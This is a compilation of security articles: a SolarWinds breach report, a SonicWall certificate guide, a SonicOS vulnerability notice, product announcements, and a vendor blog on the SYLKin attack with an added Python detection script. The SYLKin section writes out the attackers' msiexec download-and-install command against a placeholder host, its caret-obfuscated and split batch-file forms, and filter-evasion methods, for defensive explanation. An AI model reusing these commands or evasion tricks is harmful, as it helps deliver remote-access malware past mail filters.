Microsoft Says Its Systems Were Also Breached in Massive SolarWinds Hack

The massive state-sponsored espionage campaign that compromised software maker SolarWinds also targeted Microsoft, as the unfolding investigation into the hacking spree reveals the incident may have been far wider in scope, sophistication, and impact than previously thought.

News of Microsoft’s compromise was first reported by Reuters, which also said the company’s own products were then used to strike other victims by leveraging its cloud offerings, citing people familiar with the matter.

The Windows maker, however, denied the threat actor had infiltrated its production systems to stage further attacks against its customers.

In a statement to The Hacker News via email, the company said —

“Like other SolarWinds customers, we have been actively looking for indicators of this actor and can confirm that we detected malicious SolarWinds binaries in our environment, which we isolated and removed. We have not found evidence of access to production services or customer data. Our investigations, which are ongoing, have found absolutely no indications that our systems were used to attack others.”

Characterizing the hack as “a moment of reckoning,” Microsoft president Brad Smith said it has notified over 40 customers located in Belgium, Canada, Israel, Mexico, Spain, the UAE, the UK, and the US that were singled out by the attackers. 44% of the victims are in the information technology sector, including software firms, IT services, and equipment providers.

CISA Issues New Advisory

The development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) published a fresh advisory, stating the “APT actor [behind the compromises] has demonstrated patience, operational security, and complex tradecraft in these intrusions.”

“This threat poses a grave risk to the Federal Government and state, local, tribal, and territorial governments as well as critical infrastructure entities and other private sector organizations,” it added.

But in a twist, the agency also said it identified additional initial infection vectors, other than the SolarWinds Orion platform, that the adversary has leveraged to mount the attacks, including a previously stolen key used to circumvent Duo’s multi-factor authentication (MFA) and access a user’s mailbox via the Outlook Web App (OWA) service.

Digital forensics firm Volexity, which tracks the actor under the moniker Dark Halo, said the MFA bypass was one of three incidents between late 2019 and 2020 aimed at a US-based think tank.

The entire intrusion campaign came to light earlier this week when FireEye disclosed it had detected a breach that also pilfered its Red Team penetration testing tools.

Since then, a number of agencies have been found to be attacked, including the US departments of Treasury, Commerce, Homeland Security, and Energy, the National Nuclear Security Administration (NNSA), and several state department networks.

While many details continue to remain unclear, the revelation about new modes of attack raises more questions about the level of access the attackers were able to gain across government and corporate systems worldwide.

Microsoft, FireEye, and GoDaddy Create a Killswitch

Over the last few days, Microsoft, FireEye, and GoDaddy seized control of avsvmcloud[.]com, one of the main domains (registered through GoDaddy) that the hackers used to communicate with compromised systems, reconfiguring it to act as a killswitch that prevents the SUNBURST malware from continuing to operate on victims’ networks.

For its part, SolarWinds has not yet disclosed how exactly the attacker managed to gain extensive access to its systems to be able to insert malware into the company’s legitimate software updates.

Recent evidence, however, points to a compromise of its build and software release system. An estimated 18,000 Orion customers are said to have downloaded the updates containing the back door.

Symantec, which earlier uncovered more than 2,000 systems belonging to 100 customers that received the trojanized SolarWinds Orion updates, has now confirmed the deployment of a separate second-stage payload called Teardrop that’s used to install the Cobalt Strike Beacon against select targets of interest.

The hacks are believed to be the work of APT29, a Russian threat group also known as Cozy Bear, which has been linked to a series of breaches of critical US infrastructure over the past year.

The latest slew of intrusions has also led CISA, the US Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI) to issue a joint statement, stating the agencies are gathering intelligence in order to attribute, pursue, and disrupt the responsible threat actors.

Calling for stronger steps to hold nation-states accountable for cyberattacks, Smith said the attacks represent “an act of recklessness that created a serious technological vulnerability for the United States and the world.”

“In effect, this is not just an attack on specific targets, but on the trust and reliability of the world’s critical infrastructure in order to advance one nation’s intelligence agency,” he added.

Generate & Import an SSL Certificate (SonicWall)

DESCRIPTION:

This article contains the steps required for generating a PKCS#12 file for import on an Email Security appliance.

RESOLUTION:

The first step is to generate a private key which can be done either in Linux or Windows.

Generating a private key in Linux

Access terminal within a Linux box

Type in (or paste) the following command. The names of the CSR and private key files (my_csr.txt and privatekey.txt) can be adjusted accordingly, but the file type needs to remain the same.

 openssl req -out my_csr.txt -new -newkey rsa:2048 -nodes -keyout privatekey.txt

Skip to Generating the PKCS#12 file.

Generating a private key in Windows

1. Go to http://gnuwin32.sourceforge.net/packages/openssl.htm and download the openssl-0.9.8h-1-setup.exe file.

2. Run the .exe and install to c:\openssl

3. After installation completes, copy and paste the following into a text editor and save as openssl.cnf to C:\openssl\bin

 NOTE: Edit the alt_names section to include any SAN names that are needed, no other sections need to be edited at this time

[ req ]
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = US
stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Arizona
localityName = Locality Name (eg, city)
localityName_default = Phoenix
0.organizationName = Organization Name (eg, company)
0.organizationName_default = Test Bed USA
organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = IT
commonName = Common Name of device
commonName_default = mail.example.com
commonName_max = 64

[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names

[alt_names]
DNS.1 = RA1.example.com
DNS.2 = RA2.example.com
DNS.3 = CC1.example.com

4. Open a command prompt & type or copy/paste cd c:\openssl\bin

5. Type openssl and press Enter, then paste the following command at the next prompt and move on to Generating the PKCS#12 file.

req -new -newkey rsa:2048 -nodes -keyout privatekey.txt -out my_csr.txt -config openssl.cnf
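Before feeding a hand-edited openssl.cnf to the req command, it is worth checking the alt_names section mechanically: a repeated DNS.n index (as easily happens when entries are copied and pasted) or a gap in the numbering can go unnoticed and leave a name out of the CSR, and a common name that is not also listed as a SAN will be ignored by modern clients. The following Python is an added example, not part of the SonicWall article; the sample config is constructed after the article's fragment and deliberately repeats the DNS.2 index.

```python
import re
from collections import OrderedDict

# Constructed sample, modelled on the openssl.cnf fragment in the article
# (not the article's own text). It repeats the DNS.2 index in [alt_names],
# the kind of slip that creeps in when SAN entries are added by hand.
SAMPLE_CNF = """
[ req ]
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ req_distinguished_name ]
commonName = Common Name of device
commonName_default = mail.example.com
commonName_max = 64

[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names

[alt_names]
DNS.1 = RA1.example.com
DNS.2 = RA2.example.com
DNS.2 = CC1.example.com
"""


def parse_cnf(text):
    """Parse the OpenSSL config dialect into {section: [(key, value), ...]}.
    Duplicates and order are kept on purpose: a dict would hide exactly the
    repeated key this check is looking for."""
    sections = OrderedDict()
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        header = re.match(r"^\[\s*([^\]]+?)\s*\]$", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current].append((key, value))
    return sections


def check_san_config(text):
    """Return a list of findings about the SAN setup; an empty list means consistent."""
    findings = []
    cfg = parse_cnf(text)
    req = dict(cfg.get("req", []))
    ext_section = req.get("req_extensions")
    if ext_section not in cfg:
        return ["req_extensions does not name an existing section"]
    ext = dict(cfg[ext_section])
    if "digitalSignature" not in ext.get("keyUsage", ""):
        findings.append("keyUsage lacks digitalSignature, needed for (EC)DHE key exchange")
    san = ext.get("subjectAltName", "")
    if not san.startswith("@") or san[1:] not in cfg:
        return findings + ["subjectAltName does not reference an existing alt_names section"]
    indices, names, seen = [], [], set()
    for key, value in cfg[san[1:]]:
        m = re.match(r"^(DNS|IP|email)\.(\d+)$", key)
        if not m:
            findings.append(f"unexpected alt_names key: {key}")
            continue
        kind, idx = m.group(1), int(m.group(2))
        if (kind, idx) in seen:
            findings.append(f"duplicate {kind}.{idx} ({value}): only one of the values will reach the CSR")
        seen.add((kind, idx))
        indices.append((kind, idx))
        names.append(value)
    for kind in sorted({k for k, _ in indices}):
        nums = sorted({i for k, i in indices if k == kind})
        if nums != list(range(1, len(nums) + 1)):
            findings.append(f"{kind}.n indices are not contiguous from 1: {nums}")
    cn = dict(cfg.get("req_distinguished_name", [])).get("commonName_default")
    if cn and cn not in names:
        findings.append(f"commonName_default {cn} is not listed in alt_names; modern clients validate only the SAN list")
    return findings


if __name__ == "__main__":
    for finding in check_san_config(SAMPLE_CNF):
        print("FINDING:", finding)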

Generating the PKCS#12 file

1. Enter the information appropriate to the organization

2. Once the information is entered, two files will be created and placed in the C:\openssl\bin directory, my_csr.txt and privatekey.txt. Save them in a secure location.

3. Submit the my_csr.txt file to a Certificate Authority.

4. Download the necessary intermediate and root certificates.

5. From the command prompt, navigate to the openssl application as noted above and type or copy/paste the following to convert to PFX.

openssl pkcs12 -export -out certificate.pfx -inkey privatekey.txt -in certificate.crt -certfile CACert.crt

 NOTE: Edit the command with the appropriate information: certificate.pfx is the name of the converted certificate, privatekey.txt is the file generated in step 2, certificate.crt is the certificate generated by the CA, CACert.crt are the intermediate certs generated by the CA

6. Alternately, the certificate converter on https://www.sslshopper.com/ssl-converter.html can be used

 CAUTION: Using the converter is not recommended due to exposure of the private key to the internet

Importing the PKCS#12 file to the ES appliance

1. Log in to the appliance and navigate to System > Certificates > Generate/Import

2. Choose a certificate name

 TIP: Use the CA followed by the expiration date of the certificate; e.g. Comodo20181212

3. Go to the “Import an existing certificate” option. Choose the PKCS#12 file generated in the previous section, create a passphrase and enter the password for the PKCS#12 file (letters and numbers ONLY).

4. Click Generate/Import

5. Configure the certificate at System > Certificates > Configure

 NOTE: Successful configuration can be tested at http://www.checktls.com/

Source :
https://www.sonicwall.com/support/knowledge-base/generate-import-an-ssl-certificate/171212150435742/

Critical SonicWall vulnerability affects 800K firewalls, patch now

A critical stack-based Buffer Overflow vulnerability has been discovered in SonicWall VPNs.

When exploited, it allows unauthenticated remote attackers to execute arbitrary code on the impacted devices.

Tracked as CVE-2020-5135, the vulnerability impacts multiple versions of SonicOS run by hundreds of thousands of active VPNs.

Craig Young of Tripwire Vulnerability and Exposure Research Team (VERT) and Nikita Abramov of Positive Technologies have been credited with discovering and reporting the vulnerability.

Shodan lists over 800,000 devices

Given an increase in employees working remotely and the reliance on corporate VPNs, easily exploitable flaws like these are concerning when it comes to security.

As confirmed by Tenable researchers and observed by BleepingComputer, as of today, Shodan shows over 800,000 VPN devices running vulnerable SonicOS software versions, depending on the search term used.

Although a Proof-of-Concept (POC) exploit is not yet available in the wild, the vast attack surface available to adversaries means companies should upgrade their devices immediately.

Potentially exploitable devices listed on Shodan running vulnerable SonicOS versions
Source: BleepingComputer

Impacted versions and remediation guidance

The following SonicWall VPN devices are impacted by CVE-2020-5135:

  1. SonicOS 6.5.4.7-79n and earlier
  2. SonicOS 6.5.1.11-4n and earlier
  3. SonicOS 6.0.5.3-93o and earlier
  4. SonicOSv 6.5.4.4-44v-21-794 and earlier
  5. SonicOS 7.0.0.0-1

“SonicWall has released updates to remediate this flaw. SSL VPN portals may be disconnected from the Internet as a temporary mitigation before the patch is applied,” stated Tripwire VERT’s advisory.

The following versions are available to upgrade to for safeguarding against this vulnerability:

  1. SonicOS 6.5.4.7-83n
  2. SonicOS 6.5.1.12-1n
  3. SonicOS 6.0.5.3-94o
  4. SonicOS 6.5.4.v-21s-987
  5. Gen 7 7.0.0.0-2 and onwards

Given the vast number of devices that are still running the outdated SonicOS versions and the critical nature of this vulnerability, complete research findings on CVE-2020-5135 are expected to be released once enough users have patched their systems.

Source :
https://www.bleepingcomputer.com/news/security/critical-sonicwall-vulnerability-affects-800k-firewalls-patch-now/

Protect Against SYLKin Attack with SonicWall Cloud App Security

With the definition of normal changing with each passing day, the ongoing pandemic has forced security professionals to re-evaluate new working models and how they can prevent attackers from targeting end users. Albert Einstein once said, “In the midst of every crisis lies great opportunity,” and this idea has formed the basis for how cybercriminals operate in the era of COVID-19.

Never ones to let an opportunity go to waste, cybercriminals are deploying new attacks each day. Microsoft was recently affected by a new SYLKin attack that bypasses both Microsoft 365 default security (EOP) and Microsoft advanced security (ATP). At the time of writing, Microsoft 365 is still vulnerable, and the attack is still being used extensively against Microsoft 365 customers.

Lately, Avanan’s security analysts have detected a significant increase in the use of SLK files in attacks against Microsoft 365 customers. In these attacks, hackers send an email with a .slk attachment that contains a malicious macro (an msiexec script) to download and install a remote access trojan.

It is a very sophisticated attack with several obfuscation methods specifically designed to bypass Microsoft 365. Gmail customers, on the other hand, are safe from this attack: Google already blocks it on incoming email and has made it impossible to send these SLK files as an attachment from a Gmail account.

What is SYLKin attack?

SLK files are rare, so if you have received one in your inbox, chances are you are being targeted by the most recent Remote Access Trojan malware, which has been ‘upgraded’ to bypass Microsoft ATP. The attack method itself has been extensively documented, so I’ll only explain it briefly. The focus will be on how such a well-understood attack bypassed Office 365 filters, including Microsoft ATP.

The attack specifically targets Microsoft 365 accounts and until recently, was isolated to a small number of organizations.

Emails are targeted and manually created

The attack emails are highly customized, using information and language that could only have been found and written manually. The messages seem to come from a partner or customer using a topic that is highly specific to the organization and the individual. For example, an email to a manufacturer will discuss parts specifications, an email to a tech firm will ask for changes to a large electronics order, or an email to a government department will discuss legal concerns. The subjects, contents and even the attached files are customized with the target’s name and organization. No two are alike. What they have in common is that the messages are realistic and compelling enough to convince a user to click on the attached SLK file.

What is a SLK file?

A so-called “Symbolic Link” (SLK) file is Microsoft’s human-readable, text-based spreadsheet format that saw its last update around the time that “Dallas” went off the air in 1986. At a time when XLS files were proprietary, SLK was an open-format alternative before XLSX was introduced in 2007. To the end user, a SLK file looks like an Excel document, but for an attacker it’s an easy way to bypass Microsoft 365 security, even for accounts protected with Microsoft ATP.

What does this attack do?

A recent version of the SYLK attack includes an SLK file with an obfuscated macro designed to run a command on a Windows machine:

msiexec /i http://malicious-site.com/install.php /q

This runs Windows Installer (msiexec) in quiet mode to install whatever MSI package they decide to host on their site. In this campaign, it’s a hacked version of the off-the-shelf NetSupport remote control application, granting the attacker full control over the desktop.

Windows grants more trust to SLK files than XLSX files

Because Windows “Protected View” does not apply to SLK files downloaded from the Internet or from email, Excel does not open them in read-only mode.

When opening an SLK file, the end user does not see the Protected View warning that Excel shows for a downloaded XLSX document.

Targeted methodology to bypass Microsoft Advanced Threat Protection

The first versions of the SLK attack method were seen in 2018 and were eventually blocked by Microsoft ATP. This new campaign, however, includes a number of obfuscation techniques specifically designed to bypass Microsoft ATP.

  1. The attack was sent from hundreds of free Hotmail accounts.
  2. The macro script includes ‘^’ characters to confuse ATP filters.
  3. The URL was split in two so that ATP would not read it as a web link.
  4. The hosting server became active only after the email was sent, so it seemed benign if sandboxed by ATP.
  5. The hosting server only responded to “Windows Installer” user agents, ignoring other queries.

These methods are ATP-specific. Again, Gmail blocks these files and, in fact, makes it impossible to send from a Gmail account.

The attackers took advantage of a series of blind spots in the Microsoft email infrastructure to send this attack from thousands of disposable Hotmail accounts, with email addresses in the format “randomwords1982@hotmail.com,” each sending just a handful of messages at a time.

An important benefit of Hotmail to many attackers is that the same security filters are being used end to end. If the attacker is able to attach and send a file, it is likely that it will make it through the entire Microsoft security infrastructure. Should one of the accounts get flagged, Microsoft will disable it, informing the attacker that his messages are getting caught downstream.

While most of the well-known anonymous email-sending engines deserve their poor spam and phishing reputations, Hotmail users benefit from Microsoft’s own reputation. Since the service was merged with its own Outlook application, Microsoft seems to grant them a higher level of trust than external senders.

The macro script includes escape characters to confuse ATP filters

The attackers take advantage of the fact that ATP filters do not interpret text in the same way as the Windows command line. ATP would normally be able to identify the powerful and potentially malicious msiexec command, but the attackers inserted command-line escape characters ‘^’ to obfuscate the script.

msiexec /i http://malicious-site.com/install.php /q

becomes

M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q

When read by Advanced Threat Protection filters, the msiexec command becomes unreadable and the telltale ‘http://’ is obscured.

When read by the desktop command line, the escape characters ‘disappear,’ running as if they were never there. This is just a command-line version of the Zero-Font methodologies that have plagued ATP for years.

The URL was split into two macros so that ATP would not read it as a link

ATP does not need to see the ‘http://’ to recognize a web link and would normally catch any text of the format ‘malicious-site.com.’ In order to hide the link, the attackers split it into two separate commands.

The first macro command creates a batch file with the first half of the URL.

Set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JbfoT.bat

The second macro command adds the remainder of the URL and then runs the batch file.

Set /p=””e.com/install.php ^/q”” >> JbfoT.bat & JbfoT.bat

Within seconds, the malicious SLK file has run two simple commands to create a malicious install script and begin installing whatever software the attackers decide to host.
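The two tricks just described, caret escaping and a URL split across two set /p redirections, are what a mail filter has to undo before it can recognise the msiexec command. The Python below is an added example (not Avanan’s or SonicWall’s code) of that normalisation as a detection aid: it strips cmd.exe caret escapes, replays the redirections to approximate the batch file that would be assembled, notes whether that file is then executed, and flags an msiexec /i pointing at a remote package. It also sniffs the SYLK ‘ID;’ header so a renamed attachment is still recognised. The command strings are constructed from the ones quoted in the post; the domain is the post’s own placeholder, and the batch-file name is the one it shows.

```python
import re

# Constructed samples modelled on the commands quoted in the post; the domain
# is the post's own placeholder and the batch-file name is the one it shows.
SPLIT_COMMANDS = [
    'Set /p=""M^s^ie^xec /ih^tt^p^:^/^/malicious-sit"" > JbfoT.bat',
    'Set /p=""e.com/install.php ^/q"" >> JbfoT.bat & JbfoT.bat',
]
SINGLE_COMMAND = ['M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q']
BENIGN_COMMAND = ['echo weekly report > notes.txt']

# 'set /p=<text> > file' writes <text> into the file; '>' truncates, '>>' appends.
# The negative lookbehind keeps a caret-escaped '^>' from being read as a redirect.
REDIRECT = re.compile(
    r"set\s+/p\s*=\s*(?P<payload>.*?)\s*(?<!\^)(?P<op>>>?)\s*(?P<target>[^\s&]+)",
    re.IGNORECASE,
)
# The tell-tale shape once obfuscation is undone: msiexec /i <remote package>
INSTALLER_URL = re.compile(r'msiexec\b.*?/i\s*(?P<url>https?://[^\s"]+)', re.IGNORECASE)


def looks_like_sylk(data):
    """SYLK files begin with an 'ID;' record regardless of file name, so sniff
    the bytes rather than trusting the .slk (or any other) extension."""
    return data.lstrip().startswith(b"ID;")


def unescape_cmd(text):
    """Undo cmd.exe caret escaping: '^' followed by any character yields that
    character, so 'M^s^ie^xec' is 'Msiexec' by the time cmd.exe runs it."""
    return re.sub(r"\^(.)", r"\1", text)


def reconstruct_batch_files(commands):
    """Replay the 'set /p' redirections to approximate what each batch file
    would contain, and note which of them is run afterwards ('& file.bat').
    This is a detection aid, not a cmd.exe emulator."""
    files, executed = {}, set()
    for cmd in commands:
        m = REDIRECT.search(cmd)
        if not m:
            continue
        # Doubled quotes are Excel's escaping of a quote inside a formula string.
        text = unescape_cmd(m.group("payload").strip().strip('"'))
        target = m.group("target")
        files[target] = text if m.group("op") == ">" else files.get(target, "") + text
        if re.search(r"&\s*" + re.escape(target), cmd, re.IGNORECASE):
            executed.add(target)
    return files, executed


def analyze_commands(commands):
    """Return detection findings for a list of macro command strings."""
    findings = []
    files, executed = reconstruct_batch_files(commands)
    # Commands that do not build a file are inspected directly, de-escaped.
    direct = [unescape_cmd(c) for c in commands if not REDIRECT.search(c)]
    for source, text in [("inline", t) for t in direct] + list(files.items()):
        m = INSTALLER_URL.search(text)
        if m:
            findings.append({"rule": "msiexec remote install", "url": m.group("url"), "source": source})
    for name in sorted(executed):
        findings.append({"rule": "batch file assembled and executed", "file": name})
    return findings


if __name__ == "__main__":
    for label, sample in [("split", SPLIT_COMMANDS), ("single", SINGLE_COMMAND), ("benign", BENIGN_COMMAND)]:
        print(label, analyze_commands(sample))
```

The reconstruction deliberately ignores cmd.exe’s quoting rules (inside double quotes a caret is literal, and it is only removed when the batch line is later parsed unquoted); for detection the end result is the same, since the text that eventually runs is caret-free either way.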

The hosting server was armed after the message was sent

We don’t believe Microsoft ATP is testing these files within their sandbox environment, relying instead on static filters. But we have found that other vendors have also failed to catch this attack, even when the code is executed in a virtual environment.

There is no special code or intelligence within the script to detect if it is running within emulation. Instead, the attackers do not enable the malicious web server until shortly after the email is sent. Because it cannot reach the server, the script fails, installing nothing.

In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

How did it evade Microsoft protection?

Each of the obfuscation methodologies was designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, which requires each file to be given additional scrutiny.

Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.

If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.

Microsoft’s recommendations are much more complicated but are another alternative to protect the desktop.

Source :
https://blog.sonicwall.com/en-us/2020/08/protect-against-sylkin-attack-with-sonicwall-cloud-app-security/

New SonicWall SonicOSX 7.0 and SonicOS 7.0 Operating Systems Offer Visibility and Simplicity

Businesses are embracing digital transformation, bringing about a new era of the anytime, anywhere business. Staffed by flexible employees and built on the principle of a distributed enterprise, the resulting proliferation of applications and data presents organizations with a major security challenge.

As enterprises grow, they must proactively manage security across several different locations: at headquarters, at software-defined branches (SD-Branches), at co-located data centers or in a variety of cloud locations. These locations are not siloed — applications and data move dynamically between them, forcing security to follow.

SonicWall physical and virtual firewalls provide high-performance security across a wide range of enterprises, but protecting all these security vectors requires the ability to consistently apply the right security policy to the right network control point — while keeping in mind that some security failures can be attributed to ineffective policies or misconfigurations.

To ensure effective policy provisioning, enterprises need dynamic visibility across the network. They need a boundless approach to network security policy management.

The SonicOS or SonicOSX architecture is at the core of every SonicWall physical and virtual firewall, including the TZ, NSa, NSv and NSsp Series. Our operating systems leverage our patented, single-pass, low-latency, Reassembly-Free Deep Packet Inspection® (RFDPI) and patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technologies to deliver industry-validated high security effectiveness, Secure SD-WAN, real-time visualization, high-speed virtual private networking (VPN) and other robust security features.

The latest TZ570/670 Series firewalls run on the brand-new SonicOS 7.0, which features advanced security, simplified policy management, and critical networking and management capabilities — all designed to meet the needs of distributed enterprises with next-gen SD-Branches and small- to medium-sized businesses.

With the introduction of the brand-new SonicOSX 7.0 and SonicOS 7.0, the SonicOS operating system is setting a new standard for usability. Built from the ground up, SonicOSX 7.0 architecture features Unified Policy management, which offers integrated management of various security policies for enterprise-grade firewalls such as SonicWall NSsp and NSv firewall series.

This OS upgrade brings about multi-instance support on NSsp series firewalls. Multi-instance is the next generation of multi-tenancy, where each tenant is isolated with dedicated compute resources to avoid resource starvation.

SonicOSX 7 also provides unified policy to provision L3 to L7 controls in a single rule base on every firewall, providing admins a centralized location for configuring policies. It comes with a new web interface born from a radically different approach: a user-first design emphasis. SonicOSX’s web-based interface presents meaningful visualizations of threat information, and displays actionable alerts prompting you to configure contextual security policies with point-and-click simplicity.

In addition to being more user friendly, the new interface is also more attractive than the classic version. In a single-pane view of a firewall, the interface presents the user with information on the effectiveness of various security rules. The user is then able to modify the predefined rules for gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, and deep-packet inspection of encrypted traffic in a seamless fashion. With Unified Policy, SonicWall delivers a more streamlined experience that reduces configuration errors and deployment time for a better overall security posture.

The Unified Policy gives your organization the ability to control dynamic traffic passing through a firewall and provides visibility and insight into the disparate policies that affect gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, deep-packet inspection of encrypted traffic and more. It helps simplify management tasks, reduce configuration errors and speed up deployment time, which all contribute to a better overall security posture.

To learn more, visit www.sonicwall.com/sonicos

Source :
https://blog.sonicwall.com/en-us/2020/08/new-sonicwall-sonicosx-7-0-and-sonicos-7-0-offer-visibility-and-simplicity/

SonicWall’s New SD-Branch Solution, Multi-gigabit Switch Line Secure Dispersed Businesses, Branch Locations

There’s nothing normal about the “new business normal.” The past few months have represented a complete shift in the way we think of work, and with vastly more employees working remotely than ever before, bringing with them an unprecedented quantity of exposure points and risk, the traditional cybersecurity model is proving woefully inadequate.

As cybercriminals ramp up attacks on anyone they perceive to be vulnerable, it isn’t enough to simply enable working from home. To truly ensure business continuity, you must secure and rearchitect these massively distributed networks with a platform capable of stopping the ever-increasing number of threats — both known and unknown.

To help your organization meet the challenges brought by this new cybersecurity reality, SonicWall is introducing three new solutions: SonicWall SD-Branch, SonicWall Switch and SonicWall Capture Client 3.0.

SonicWall SD-Branch

Many businesses need to secure remote branch offices and retail stores, but it often isn’t possible — or practical — to have dedicated IT staff at each of these locations. SonicWall SD-Branch enables your organization to provide seamless connectivity that keeps pace with escalating bandwidth demands, and allows you to quickly and cost-effectively upgrade the network security at your remote locations.

Secure SD-Branch is a comprehensive solution that combines the power of secure SD-WAN, secure wireless and wired LAN technology with zero-touch deployment. Through the power of Capture Security Center, SonicWall’s cloud-based, single-pane-of-glass management console, the management, reporting and analytics for all locations are centralized and accessible from any web-enabled device.

SonicWall Switches

The shift to remote work has resulted in a sudden rise in the use of high-bandwidth applications — something that can easily overwhelm branch networks. At the same time, monitoring, managing and continually refreshing a growing number of network devices across multiple branches has grown exponentially more difficult, especially since many branch locations don’t have trained IT staff.

SonicWall Switches offer multi-gigabit wired performance that lets you rapidly scale your branch networks through remote installation. Available in seven models — ranging from eight to 48 ports, with gigabit and 10 gigabit ethernet ports — SonicWall Switches deliver network switching that accommodates the growing number of mobile and IoT devices in branch locations and provides the network performance needed to support cloud-delivered applications. SonicWall Switches also fit seamlessly into your existing SonicWall ecosystem, helping you to unify your network security posture. They’re SD-Branch-ready and managed via firewalls — either locally or through SonicWall’s cloud-based Capture Security Center — for unified, single-pane-of-glass management of your entire SonicWall infrastructure.

SonicWall Capture Client 3.0

SonicWall Capture Client 3.0 allows employees to operate remotely without having to worry about advanced threats, all while giving administrators comprehensive visibility and the ability to extend standard protections to remote endpoints. SonicWall Capture Client 3.0 is the latest iteration of our lightweight, unified endpoint protection platform, and includes a number of new and upgraded features.

Capture Client 3.0’s comprehensive, client-based content filtering allows you to easily extend network-based content filtering to off-network users. It provides HTTP and HTTPS traffic inspection capabilities, along with the ability to assign exclusions for trusted applications or blacklist untrusted applications. Capture Client also offers real-time visibility of applications and identifies vulnerabilities.

Starting with Capture Client 3.0, administrators can leverage Azure Active Directory properties for granular policy assignment based on categories such as group membership, regardless of whether the directory is hosted on-prem or in the cloud.

Capture Client 3.0 also brings in support for the SentinelOne Linux agent, enabling you to extend next-generation antimalware capabilities to Linux servers. This feature will allow customers to safeguard Linux-based workloads irrespective of their location — on-prem or in the cloud.

Source :
https://blog.sonicwall.com/en-us/2020/06/sonicwalls-new-sd-branch-solution-multi-gigabit-switch-line/

Effective Business Continuity Plans Require CISOs to Rethink WAN Connectivity

As more businesses leverage remote, mobile, and temporary workforces, the elements of business continuity planning are evolving and requiring that IT professionals look deep into the nuts and bolts of connectivity.

CISOs and their team members are facing new challenges each and every day, many of which have been driven by digital transformation, as well as the adoption of other productivity-enhancing technologies.

A case in point is the rapidly evolving need to support remote and mobile users as businesses change how they interact with staffers.

For example, the recent COVID-19 crisis has forced the majority of businesses worldwide to support employees that work from home or other remote locations.

Many businesses are encountering numerous problems with connection reliability, as well as the challenges presented by rapidly scaling connectivity to meet a growing number of remote workers.

Add to that security and privacy issues, and it becomes evident that CISOs may very well face what may become insurmountable challenges to keep things working and secure.

It is the potential for disruption that is bringing Business Continuity Planning (BCP) to the forefront of many IT conversations. What's more, many IT professionals are quickly coming to the conclusion that persistent WAN and Internet connectivity prove to be the foundation of an effective business continuity plan.

VPNs are Failing to Deliver

Virtual Private Networks (VPNs) are often the first choice for creating secure connections into a corporate network from the outside world.

However, VPNs were originally designed to let a remote endpoint attach to an internal local area network and grant that system access to the data and applications stored on the network, with occasional connectivity and ease of use in mind.

Yet VPNs are quickly beginning to show their limitations when placed under the demand of supporting a rapidly deployed remote workforce.

One of the most significant issues around VPNs comes in the context of scalability; in other words, VPNs can be complicated to scale quickly.

For the most part, VPNs are licensed by connection and are supported by an appliance on the network side that encrypts and decrypts traffic. The more VPN users are added, the more licenses and processing power are needed, which adds unforeseen costs and introduces additional latency into the network.

Eventually, VPNs can break under strain, and that creates a business continuity issue. Simply put, if VPNs become overwhelmed by increased traffic, connectivity may fail and employees may be unable to access the network; business continuity suffers as a result.

VPNs are also used for site to site connections, where the bandwidth may be shared not only from a branch office to a headquarters office but also with remote users. A situation such as that can completely derail an organization's ability to do business if those VPNs fail.

Perhaps an even bigger concern with VPNs comes in the form of cybersecurity. VPNs that are used to give remote users access to a network are only as secure as the credentials that are given to those remote users.

In some cases, users may share passwords and login information with others, or carelessly expose their systems to intrusion or theft. Because a VPN grants network-level access, a stolen or shared credential can pave the way for attacks on the corporate network by letting bad actors reach internal systems.

ZTNA Moves Beyond VPNs

With VPN technology becoming suspect in the rapid expansion of remote workforces, CISOs and IT pros are looking for alternatives to ensure reliable and secure connections into the network from remote workers.

The desire to bridge security and reliability is driven by continuity, as well as operational issues. CISOs are looking to keep costs down, provide a level of security, without compromising performance, and still meet projected growth.

Many enterprises thought that the answer to the VPN dilemma could be found in SDP (Software Defined Perimeters) or ZTNA (Zero Trust Network Access), two acronyms that have become interchangeable in the arena of cybersecurity.

ZTNA has been built for the cloud as a solution that shifted security from the network to the applications. In other words, ZTNA is application-centric, meaning that users are granted access to applications and not the complete network.

